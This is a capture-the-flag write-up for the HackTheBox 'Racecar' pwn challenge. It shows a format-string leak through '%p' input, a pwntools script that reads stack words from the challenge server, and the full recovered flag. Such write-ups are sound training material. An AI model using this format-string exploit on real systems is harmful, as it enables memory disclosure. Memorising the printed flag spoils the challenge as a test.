Racecar
CHALLENGE DESCRIPTION
Did you know that racecar spelled backwards is racecar? Well, now that you know everything about racing, win this race and get the flag!
Exploit :
Flag :
Last updated
CHALLENGE DESCRIPTION
Did you know that racecar spelled backwards is racecar? Well, now that you know everything about racing, win this race and get the flag!Last updated
┌──(root㉿kali)-[/home/kali/hackthebox/pwn]
└─# ./racecar
🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌
______ |xxx|
/|_||_\`.__ | F |
( _ _ _\ |xxx|
*** =`-(_)--(_)-' | I |
|xxx|
| N |
|xxx|
| I |
|xxx|
_-_- _/\______\__ | S |
_-_-__ / ,-. -|- ,-.`-. |xxx|
_-_- `( o )----( o )-' | H |
`-' `-' |xxx|
🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌
Insert your data:
Name: name
Nickname: something
[+] Welcome [name]!
[*] Your name is [name] but everybody calls you.. [something]!
[*] Current coins: [69]
1. Car info
2. Car selection
> 2
Select car:
1. 🚗
2. 🏎
> 2
Select race:
1. Highway battle
2. Circuit
> 1
[*] Waiting for the race to finish...
[+] You won the race!! You get 100 coins!
[+] Current coins: [169]
[!] Do you have anything to say to the press after your big victory?
> %p %p %p %p %p %p %p %p
The Man, the Myth, the Legend! The grand winner of the race wants the whole world to know this:
0x583ec200 0x170 0x565bfdfa 0x42 (nil) 0x26 0x2 0x1from pwn import *
flag = ''
# Let's fuzz x values
for i in range(100):
try:
# Connect to server
io = remote('83.136.253.251', 42831)
io.sendlineafter(b'Name: ', b'anas')
io.sendlineafter(b'Nickname: ', b'something')
io.sendlineafter(b'> ', b'2')
io.sendlineafter(b'> ', b'2')
io.sendlineafter(b'> ', b'1')
# Format the counter
# e.g. %i$p will attempt to print [i]th pointer (or string/hex/char/int)
io.sendlineafter(b'> ', '%{}$p'.format(i).encode())
# Receive the response
io.recvline()
io.recvline()
result = io.recv()
if not b'nil' in result:
print(str(i) + ': ' + str(result))
try:
# Decode, reverse endianess and print
decoded = unhex(result.strip().decode()[2:])
reversed_hex = decoded[::-1]
print(str(reversed_hex))
# Build up flag
flag += reversed_hex.decode()
except BaseException:
pass
except EOFError:
pass
# Print and close
info(flag)
io.close()┌──(kali㉿kali)-[~/hackthebox/pwn]
└─$ python exploit.py
...
[+] Opening connection to 83.136.253.251 on port 42831: Done
12: b'0x7b425448\n'
b'HTB{'
[+] Opening connection to 83.136.253.251 on port 42831: Done
13: b'0x5f796877\n'
b'why_'
[+] Opening connection to 83.136.253.251 on port 42831: Done
14: b'0x5f643164\n'
b'd1d_'
[+] Opening connection to 83.136.253.251 on port 42831: Done
15: b'0x34735f31\n'
b'1_s4'
[+] Opening connection to 83.136.253.251 on port 42831: Done
16: b'0x745f3376\n'
b'v3_t'
[+] Opening connection to 83.136.253.251 on port 42831: Done
17: b'0x665f3368\n'
b'h3_f'
[+] Opening connection to 83.136.253.251 on port 42831: Done
18: b'0x5f67346c\n'
b'l4g_'
[+] Opening connection to 83.136.253.251 on port 42831: Done
19: b'0x745f6e30\n'
b'0n_t'
[+] Opening connection to 83.136.253.251 on port 42831: Done
20: b'0x355f3368\n'
b'h3_5'
[+] Opening connection to 83.136.253.251 on port 42831: Done
21: b'0x6b633474\n'
b't4ck'
[+] Opening connection to 83.136.253.251 on port 42831: Done
22: b'0x7d213f\n'
b'?!}'
...
[*] HTB{why_d1d_1_s4v3_th3_fl4g_0n_th3_5t4ck?!}
HTB{why_d1d_1_s4v3_th3_fl4g_0n_th3_5t4ck?!}